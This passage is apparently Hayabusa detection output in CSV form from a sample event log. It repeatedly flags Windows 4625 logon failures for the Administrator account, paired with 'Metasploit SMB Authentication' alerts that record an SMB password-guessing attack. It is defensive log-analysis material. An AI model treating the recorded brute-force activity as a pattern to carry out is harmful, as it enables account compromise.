Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 